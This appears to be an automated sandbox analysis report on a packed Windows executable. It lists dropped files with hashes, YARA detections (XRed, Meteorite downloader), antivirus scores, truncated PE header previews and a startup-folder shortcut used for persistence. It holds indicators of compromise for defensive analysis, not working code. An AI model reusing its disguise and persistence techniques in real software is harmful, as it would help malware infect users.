                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......M.b.............z.......z......z.......[.......z..............[...I...[...(........................Rich....................PE..L...s"&g.....................v......,:.......0....@.......................................@.................................xG..<...............................L*......p...........................0...@............0...............................text............................... ..`.rdata..*"...0...$..................@..@.data...@ ...`.......@..............@....rsrc................R..............@..@.reloc..L*.......,...V..............@..B........................................................................................................................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Local\Temp\HjsFu2ta.exe

                                                                            Download File
                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):771584
                                                                            Entropy (8bit):6.626509498726225
                                                                            Encrypted:false
                                                                            SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9IMr:ansJ39LyjbJkQFMhmC+6GD9H
                                                                            MD5:00367A9FAA8069389A97267D772563E8
                                                                            SHA1:1C5301544B6B3FC11B71B6A2EBBD1D40F193619E
                                                                            SHA-256:2B451F3AE3ABEE380824404CDF795090102D57D7D369D861EC3BDA35528F2DF0
                                                                            SHA-512:D31767C02686D40BC60BC7439D9708EC6D67A904AF12A150650174BFCC0C432E3C5A3DCA87710EB06E2FE97903805B7C01949274F9C9DE3EA05187F4DF457EB5
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\AppData\Local\Temp\HjsFu2ta.exe, Author: Joe Security
                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\HjsFu2ta.exe, Author: Joe Security
                                                                            Antivirus:
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            • Antivirus: ReversingLabs, Detection: 100%
                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                                            C:\Users\user\AppData\Local\Temp\HjsFu2ta.ico

                                                                            Download File
                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                            File Type:MS Windows icon resource - 1 icon, 32x32, 32 colors
                                                                            Category:dropped
                                                                            Size (bytes):4286
                                                                            Entropy (8bit):2.6716997814064625
                                                                            Encrypted:false
                                                                            SSDEEP:24:GIwewME/cE/xrnH+6666xF6666xf/b2Brw2Br4/RxhxkirrsirrnDvDeDx/XJ:FHIX5rnHQ/LcwcCrRDvDeDb
                                                                            MD5:30A1F328716B6782D8A033DC5004DDE5
                                                                            SHA1:C915B532DCB3DA2E851385867E31AAA89876278C
                                                                            SHA-256:46C4A5805F8028B15C826EDAAAF8C4C098F3640615BC9A4DC0C1A2288D02B0E7
                                                                            SHA-512:2A402C425053D32AF253AB979AD1465D2873EAFE1BDBA326562AB49AC39D63207960957449A7CCC233D011052A923D3EE29F57AF923A9106283ABB77C6BE39A6
                                                                            Malicious:false
                                                                            Preview:...... .............(... ...@..... .................................................T...T...T...T...T...T...T...T...T...T...T...T...T...T...T...T...T...T...T...T...s...s...........................................T...T...T...T...T...T...T...T...T...T...T...T...T...T...T...T...T...T...T...T...s...s...........................................b...b...b...b...b...b...a...a...Y...Y...T...T...b...b...b...b...b...b...b...b...................................................b...b...b...b...b...b...a...a...Y...Y...T...T...b...b...b...b...b...b...b...b..........................................................................................._..._..........................................................................................................................._..._...................................................................................................................................X...X.............................................................................................

                                                                            C:\Users\user\AppData\Local\Temp\RCXF308.tmp

                                                                            Download File
                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):778240
                                                                            Entropy (8bit):6.6240473196681755
                                                                            Encrypted:false
                                                                            SSDEEP:12288:qMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9kxj:qnsJ39LyjbJkQFMhmC+6GD9C
                                                                            MD5:B23FC8AFE875DC99D68C543D776BB58D
                                                                            SHA1:AC64A4A1D9297B78A8393E9CDD0609009956DA9B
                                                                            SHA-256:38317B1DBEB3A8A8204D74F97BCF4A8B5A7A6A8FD22F40C0403880AF27F5D820
                                                                            SHA-512:B4F236784A706CF93C0769369D24919DC7118A5C2D1F1CF7C10F70850BE11F666C95A3D5C560BCADB3B3EA6A4BCC5790604E5E82D88CBDA9AEAA32BB056D9DFF
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\AppData\Local\Temp\RCXF308.tmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\RCXF308.tmp, Author: Joe Security
                                                                            • Rule: MALWARE_Win_Meteorite, Description: Detects Meteorite downloader, Source: C:\Users\user\AppData\Local\Temp\RCXF308.tmp, Author: ditekSHen
                                                                            Antivirus:
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................@....................@..........................@...................@..............................B*......07...................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...07.......8..................@..P....................................@..P........................................................................................................................................

                                                                            C:\Users\user\AppData\Local\Temp\RCXF376.tmp

                                                                            Download File
                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):778240
                                                                            Entropy (8bit):6.625613104693741
                                                                            Encrypted:false
                                                                            SSDEEP:12288:qMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9kJj:qnsJ39LyjbJkQFMhmC+6GD9a
                                                                            MD5:BFEEB337E2E75AF21DC4CF7DDA131F44
                                                                            SHA1:87ACAF46B3DB499EE1BAAE058493EEB8B92E7644
                                                                            SHA-256:7EBF384E2960F26A0F9D76DD8E4A1090326AA2E02019E7686A8A99641A6ABB49
                                                                            SHA-512:975DA4E02F010E366EDBEDBC199BE2BEAA482D923D7100C6B8771BDED87D824560F6C718C4E8DF3221231C40179C7EC4EFA89948550E2A488146955A5B9B20F7
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\AppData\Local\Temp\RCXF376.tmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\RCXF376.tmp, Author: Joe Security
                                                                            • Rule: MALWARE_Win_Meteorite, Description: Detects Meteorite downloader, Source: C:\Users\user\AppData\Local\Temp\RCXF376.tmp, Author: ditekSHen
                                                                            Antivirus:
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            • Antivirus: ReversingLabs, Detection: 92%
                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................@....................@..........................@...................@..............................B*......07...................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...07.......8..................@..P....................................@..P........................................................................................................................................

                                                                            C:\Users\user\AppData\Local\Temp\SiyGYB3T.xlsm

                                                                            Download File
                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                            File Type:Microsoft Excel 2007+
                                                                            Category:dropped
                                                                            Size (bytes):18387
                                                                            Entropy (8bit):7.523057953697544
                                                                            Encrypted:false
                                                                            SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                            MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                            SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                            SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                            SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                            Malicious:false
                                                                            Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

                                                                            C:\Users\user\AppData\Local\Temp\aByzSrC.ini

                                                                            Download File
                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1652
                                                                            Entropy (8bit):5.255275263873432
                                                                            Encrypted:false
                                                                            SSDEEP:24:GgsF+0FSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+K+pAZewRDK4mW
                                                                            MD5:334970C16A1DBCC21DE972A327282883
                                                                            SHA1:5A3A6140C650EC8E433B3F2393EBE768B5FCDA72
                                                                            SHA-256:EE71F37EFD3E70619C6B42CDFA51D0A0EC8B8697BC60ED154ECCDF49E0135206
                                                                            SHA-512:0B08F63845B89591964953A0E8147F980C1108DBE9F3BF18365CCCF0FC74B8E74E3ED6C1750553E372D86B026A45071EE61A1C551183E044A728A63BBDBF610F
                                                                            Malicious:false
                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ueLS-LvpAf68gaIkO8ww1w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                            C:\Users\user\AppData\Local\Temp\~$SiyGYB3T.xlsm

                                                                            Download File
                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):165
                                                                            Entropy (8bit):1.4377382811115937
                                                                            Encrypted:false
                                                                            SSDEEP:3:KVC+cAmltV:KVC+cR
                                                                            MD5:9C7132B2A8CABF27097749F4D8447635
                                                                            SHA1:71D7F78718A7AFC3EAB22ED395321F6CBE2F9899
                                                                            SHA-256:7029AE5479F0CD98D892F570A22B2AE8302747DCFF3465B2DE64D974AE815A83
                                                                            SHA-512:333AC8A4987CC7DF5981AE81238A77D123996DB2C4C97053E8BD2048A64FDCF33E1245DEE6839358161F6B5EEA6BFD8D2358BC4A9188D786295C22F79E2D635E
                                                                            Malicious:false
                                                                            Preview:.user ..j.o.n.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                            C:\Users\user\AppData\Local\Temp\~DFC01F58D8FD95D76B.TMP

                                                                            Download File
                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                            Category:dropped
                                                                            Size (bytes):32768
                                                                            Entropy (8bit):3.746897789531007
                                                                            Encrypted:false
                                                                            SSDEEP:192:QuY+pHkfpPr76TWiu0FPZK3rcd5kM7f+ihdCF3EiRcx+NSt0ckBCecUSaFUH:ZZpEhSTWi/ekfzaVNg0c4gU
                                                                            MD5:7426F318A20A187D88A6EC88BBB53BAF
                                                                            SHA1:4F2C80834F4B5C9FCF6F4B1D4BF82C9F7CCB92CA
                                                                            SHA-256:9AF85C0291203D0F536AA3F4CB7D5FBD4554B331BF4254A6ECD99FE419217830
                                                                            SHA-512:EC7BAA93D8E3ACC738883BAA5AEDF22137C26330179164C8FCE7D7F578C552119F58573D941B7BEFC4E6848C0ADEEF358B929A733867923EE31CD2717BE20B80
                                                                            Malicious:false
                                                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cbas.lnk

                                                                            Download File
                                                                            Process:C:\Windows\wic.exe
                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Sat Nov 2 13:16:07 2024, mtime=Sat Nov 2 13:16:13 2024, atime=Sat Nov 2 12:00:35 2024, length=295424, window=hide
                                                                            Category:dropped
                                                                            Size (bytes):795
                                                                            Entropy (8bit):4.780602957967742
                                                                            Encrypted:false
                                                                            SSDEEP:24:8+52kaszxaOA9+WZ2+J2bMQdpOpGhmxG:8g2hsFaVjYMEXdpu0Q
                                                                            MD5:64C03FC25A3910E81DD3546B9F3AD9DC
                                                                            SHA1:91FAB936A1C333B2E8CE2E5F265AD70B391CC837
                                                                            SHA-256:8C510C1B0BF0150FDA99F7ECCA9D82D7671C9839CC719226B5F06E95BCF814AF
                                                                            SHA-512:205431CEC31F540C50D0694FAF917F0FCA845A9FAA1552BA80495CAAC21FF35F9B917C5B19A015A01CE7A1494F2FA4E4A7BB4381C1049599266FA8E3C84AB9D3
                                                                            Malicious:false
                                                                            Preview:L..................F.... ....".1-...}..1-.....4'-...............................P.O. .:i.....+00.../C:\...................V.1.....^Yey..Windows.@......OwHbYik....8.....................-...W.i.n.d.o.w.s.....Z.2.....bY.h .cbas.exe..B......bY.rbY.r.....R........................c.b.a.s...e.x.e.......B...............-.......A............e=(.....C:\Windows\cbas.exe........\.....\.....\.W.i.n.d.o.w.s.\.c.b.a.s...e.x.e...C.:.\.W.i.n.d.o.w.s.........$..................C..B..g..(.#....`.......X.......desktop-41g4k28..P....A....r.............).J..P....A....r.............).J.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.5.7.4.2.7.7.0.1.6.-.1.5.6.3.0.8.5.8.6.1.-.2.1.0.3.6.0.1.2.2.7.-.1.0.0.0.........9...1SPS..mD..pH.H@..=x.....h....H.....K.X..K..cf................

                                                                            C:\Users\user\Desktop\._cache_1.exe

                                                                            Download File
                                                                            Process:C:\Program Files (x86)\1.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                            Category:dropped
                                                                            Size (bytes):59392
                                                                            Entropy (8bit):7.740813131636102
                                                                            Encrypted:false
                                                                            SSDEEP:1536:lagFhC7rPABRRelUuTBRTn+mqy8oxwRKVl3:laghCQBXeGwBgmN8HQVl
                                                                            MD5:AED710082D6986C6DCEED09D3A5EDCC6
                                                                            SHA1:02456D21CEF29BE4CB63004AEA6AA225A90FD882
                                                                            SHA-256:5CBE5888CD034B95B14F4AD7C63F84F9C9BC605558C5CC484E26C13F1978399E
                                                                            SHA-512:4BCCAB62E816E296BECD7318FF76D8FEFA1F1CD25BDFCFB092C4424F3CC37E9EDB46C90DAE78D364C4406C954EAF75A6E18B7499D51B164D1DDF0136E4F52050
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 21%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......{..Y?...?...?...D...0.......=...P...4...P...=...?...<...]...4...?.......9=..:...9=..1.......>...Rich?...................PE..L....?s<..................... ...0.......@... ....@..........................@.............................................../....... ..............................................................................................................UPX0.....0..............................UPX1.........@......................@....rsrc.... ... ......................@......................................................................................................................................................................................................................................................................................................................................................................................3.91.UPX!....

                                                                            C:\Users\user\Desktop\._cache_2.exe

                                                                            Download File
                                                                            Process:C:\Program Files (x86)\2.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):3873864
                                                                            Entropy (8bit):7.971668911555834
                                                                            Encrypted:false
                                                                            SSDEEP:98304:x6wcOBfKGSUjkO80kI//gmiklAV+vuGKiSB8zI9ShRbfVdsFWy:xiGtJkI/9JQ+vuziSXkfBdkD
                                                                            MD5:B7176450AEBB9572B34E875984456AC1
                                                                            SHA1:5D9D1824C5C235DCFC82E6E3AF48B63D70016393
                                                                            SHA-256:F78DCB1B389C99240BEFDE490F8C74D9C9487F54E1F523397AA056072003A4C2
                                                                            SHA-512:4C9ABA9B92972312C87D2B875246B22DAFCB49A0F519291FBA823CE57DD9282E25489A7CDDF7DFB432CAA921602DB6266B0E625AAE780845824F91CF48D8F85D
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 12%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|.w.8..[8..[8..[s..Z5..[s..Z...[...[:..[...Z,..[...Z-..[...Z...[s..Z&..[s..Z9..[s..Z?..[8..[!..[...Z...[...Z9..[...[9..[...Z9..[Rich8..[................PE..L...!S5e...............!.....h.......2............@...................................<...@..........................h..4...4h..P....P...f............:..(.......)...0..T...................@1......h...@...............l...P].......................text...<........................... ..`.rdata..............................@..@.data................d..............@....didat.......@.......r..............@....rsrc....p...P...h...t..............@..@.reloc...).......*..................@..B........................................................................................................................................................................................................................................

                                                                            C:\Users\user\Documents\HTAGVDFUIE.xlsm

                                                                            Download File
                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                            File Type:Microsoft Excel 2007+
                                                                            Category:dropped
                                                                            Size (bytes):18387
                                                                            Entropy (8bit):7.523057953697544
                                                                            Encrypted:false
                                                                            SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                            MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                            SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                            SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                            SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                            Malicious:false
                                                                            Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

                                                                            C:\Users\user\Documents\~$HTAGVDFUIE.xlsx

                                                                            Download File
                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):165
                                                                            Entropy (8bit):1.4377382811115937
                                                                            Encrypted:false
                                                                            SSDEEP:3:KVC+cAmltV:KVC+cR
                                                                            MD5:9C7132B2A8CABF27097749F4D8447635
                                                                            SHA1:71D7F78718A7AFC3EAB22ED395321F6CBE2F9899
                                                                            SHA-256:7029AE5479F0CD98D892F570A22B2AE8302747DCFF3465B2DE64D974AE815A83
                                                                            SHA-512:333AC8A4987CC7DF5981AE81238A77D123996DB2C4C97053E8BD2048A64FDCF33E1245DEE6839358161F6B5EEA6BFD8D2358BC4A9188D786295C22F79E2D635E
                                                                            Malicious:false
                                                                            Preview:.user ..j.o.n.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                            C:\Users\user\Documents\~$cache1

                                                                            Download File
                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):771584
                                                                            Entropy (8bit):6.626509498726225
                                                                            Encrypted:false
                                                                            SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9IMr:ansJ39LyjbJkQFMhmC+6GD9H
                                                                            MD5:00367A9FAA8069389A97267D772563E8
                                                                            SHA1:1C5301544B6B3FC11B71B6A2EBBD1D40F193619E
                                                                            SHA-256:2B451F3AE3ABEE380824404CDF795090102D57D7D369D861EC3BDA35528F2DF0
                                                                            SHA-512:D31767C02686D40BC60BC7439D9708EC6D67A904AF12A150650174BFCC0C432E3C5A3DCA87710EB06E2FE97903805B7C01949274F9C9DE3EA05187F4DF457EB5
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\Documents\~$cache1, Author: Joe Security
                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Documents\~$cache1, Author: Joe Security
                                                                            Antivirus:
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            • Antivirus: ReversingLabs, Detection: 100%
                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                                            C:\Windows\cbas.exe

                                                                            Download File
                                                                            Process:C:\Windows\wic.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):295424
                                                                            Entropy (8bit):6.538320460768025
                                                                            Encrypted:false
                                                                            SSDEEP:6144:f+VQ8IwL+ws3cGW4sUwbSQ5LXqAKMQ0LAObegN:f+VDrrGW4sUwbSQpQ0LFey
                                                                            MD5:9FD7C0ACC95C7F1311BDE279D0B6A03A
                                                                            SHA1:D4F4669166DA05A147EFC8CCC0EEE9AFCA11E31C
                                                                            SHA-256:C79ED70E47990280B90BDC01049AF041B331E1559CFC34D3721B5AAB3E0A75D1
                                                                            SHA-512:CD8F0FB24B6E390249049507684C4C84D57A4C4BE9C5260C41A64C7B875D71FCE925582286A9D409D97797B33C2643F87EEA264505CB2103D20EAD6C82657B6A
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            • Antivirus: ReversingLabs, Detection: 47%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......M.b.............z.......z......z.......[.......z..............[...I...[...(........................Rich....................PE..L...s"&g.....................v......,:.......0....@.......................................@.................................xG..<...............................L*......p...........................0...@............0...............................text............................... ..`.rdata..*"...0...$..................@..@.data...@ ...`.......@..............@....rsrc................R..............@..@.reloc..L*.......,...V..............@..B........................................................................................................................................................................................................................................................................................................

                                                                            C:\Windows\msslac.dll

                                                                            Download File
                                                                            Process:C:\Windows\wic.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):208896
                                                                            Entropy (8bit):6.070094852016993
                                                                            Encrypted:false
                                                                            SSDEEP:3072:gPTXczuCIcS5TqD4ejPXptBacZEvDkFOS94NtP6p6TQceOM:mszGT5TqEer9a6Evw26pK
                                                                            MD5:5E3BC49297F0765C486693790157273F
                                                                            SHA1:7CFD2A0465B27C7201C5F096495201D16F5771EB
                                                                            SHA-256:7420929E197D7328C047B8CB9075258367AC58935A8DA197F0A8A8C856292633
                                                                            SHA-512:6F7E2948C72398422B160D735E8D133EB95F91567820AC9C8853AA75CF2B1F9712242F538950BF969B9A0933FE659CDA0CDF2DB77B34FF22A99A875FB392D612
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s.............q.....q.........g.............#.......................................Rich....................PE..L.....&g...........!......... ......B........................................p......)T...............................{..C...pg...........:................... ..x...p................................C..@....................f..@....................text...^........................... ..`.rdata...k.......p..................@..@.data...|Z....... ..................@....rsrc....:.......@..................@..@.reloc...I... ...P..................@..B................................................................................................................................................................................................................................................................................................................

                                                                            C:\Windows\wic.exe

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):3483648
                                                                            Entropy (8bit):7.130127005924049
                                                                            Encrypted:false
                                                                            SSDEEP:98304:AC4igShR3sZxWFJhbmp2KuSKafRJFLOAkGkzdnEVomFHKnP:F4ifqEwuSKanFLOyomFHKnP
                                                                            MD5:6AD65B03E75BC5509BA3104510178EE6
                                                                            SHA1:DBA73F97938D2DAB4BF8FB8076B363DB82AD3A16
                                                                            SHA-256:4D74EB72321C5137ED364541DEEF19DDC30593FFF62ABAB2A3D17A0BAD7BD5C6
                                                                            SHA-512:976C7ABA50E17271F6AEA4AB80E7BC89E68727164D98D99566E0752B4989D716A849B0CC53F0321A53DCE6086EF4CAB1604AAE8456CE76BFEACF185137AA8BA8
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 39%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g.3.#.].#.].#.].F.^.=.].F.Y...].F.X...].F.[. .].q.Y...].q.^.:.].q.X._.].F.\...].#.\.5.]...T. .].....".].#..".]..._.".].Rich#.].................PE..L....>&g.....................R...............0....@...........................5...........@..................................[..|....P.......................p3..2......p...............................@............0...............................text............................... ..`.rdata...b...0...d..................@..@.data...........^..................@....rsrc........P......................@..@.reloc...2...p3..4....2.............@..B........................................................................................................................................................................................................................................................................................

                                                                            Static File Info

                                                                            General

                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                            Entropy (8bit):5.851653303471141
                                                                            TrID:
                                                                            • Win32 Executable (generic) a (10002005/4) 98.59%
                                                                            • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                                                            • UPX compressed Win32 Executable (30571/9) 0.30%
                                                                            • Win32 EXE Yoda's Crypter (26571/9) 0.26%
                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                            File name:file.exe
                                                                            File size:6'656 bytes
                                                                            MD5:06303600a3a44eb2fbce248eb0fe9fc1
                                                                            SHA1:ccfb720a50808469da5d67eea306d08f51e11538
                                                                            SHA256:db69f19879e131fd35e882606148335c6dcb26cbea650d394ba519d76c57bb85
                                                                            SHA512:b135f23760aba312cb0c0cab697d2ec4f735f5cad9011d3b11310eb9cc59f65c4ffdc757e4f39bdcf6c8abb3badb6865301ffd5ed817c1251b6ecabe21f17df9
                                                                            SSDEEP:192:DfaOBqbo/qmA2LEnrtDINynT+vCgcJXB:OOY8tLqltJXB
                                                                            TLSH:C1D15B4AFB61AC33E215893165AFD6732645F460423E0B8B7AF42F473C62611BF06E32
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............i...i...i...d...i.Rich..i.................PE..L.....U].........................P.. j...`...p....@........................

                                                                            File Icon

                                                                            Icon Hash:061606063b074e20

                                                                            Static PE Info

                                                                            General

                                                                            Entrypoint:0x406a20
                                                                            Entrypoint Section:UPX1
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                            DLL Characteristics:
                                                                            Time Stamp:0x5D55F49F [Fri Aug 16 00:11:11 2019 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:4
